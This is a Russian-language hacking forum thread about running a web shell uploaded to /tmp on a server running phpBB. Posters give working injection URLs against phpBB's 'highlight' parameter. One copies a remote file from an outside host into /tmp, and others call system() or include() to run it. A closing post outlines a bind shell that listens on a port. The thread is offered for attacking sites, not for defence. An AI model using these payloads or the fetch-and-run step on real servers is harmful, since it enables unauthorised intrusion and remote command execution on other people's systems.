Если заливаю шелл в /tmp, смогу ли его запустить из браузера?
 

Я знаю что вех уже задолбал phpBB но я хочу коешто уточнить.
Говорят что на 90% компов папка /tmp открыта для записи.
Я верю но, даже если я залью шелл в /tmp, как я могу его запустить из браузера.
Жду ответов.

Напиши плиззз комманду, которая зальёт этот шелл в твою папку..

никак. Шелл наао заливать в папку с самим сайтом. Хотя смотря какой шелл.

Ну вот ты какой коммандой залил свой шелл в папку /tmp ???

А какой шелл можно заливать не в папку с сайтом? Скажи имя, И если не жалко и его адрес.

Вот такой.
viewtopic.php?a=http://seechat.fatal.ru/sql.hp&b=/tmp/remview.php&t=470&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527

если файл 1.php лежит в /tmp, то можешь запустить так
viewtopic.php?t=[topic]&highlight=%2527.system($_GET[cmd]).%2527&cmd=php /tmp/1.php

увы не получится. Там закрыт и shell и system()

viewtopic.php?t=[topic]&highlight=%2527.include($_GET[cmd]).%2527&cmd=/tmp/1.php
хотя не обязательно сработает, но попытка - не пытка =)

кароче обьясню на пальцах.
пример:
Ставим апаче.
Диск С это диск, который юзверь не видит. Папка html это папка откуда грузится сайт. Так вот если нужно что-бы веб-шелл грузил по такому методу http://bla-bla.ru/shell/shell.php то он должен быть залить в папку /html/shell/ а если ты зальеш выше папки html то ты его просто не откроеш
Случай 2.
Заливаем на диск С файл, который открывает на серваке порт и ждет команд, коннектимся к серву на этот порт и вот у нас шелл =)

ЗЫ Обьяснял на пальцах. Нимного не так. Если учесть что большинство серваков стоят на никсах и там нету диска С, но суть помойму высказал.

ЗЗЫ Многие серваки просто не пустят в папку /tmp =)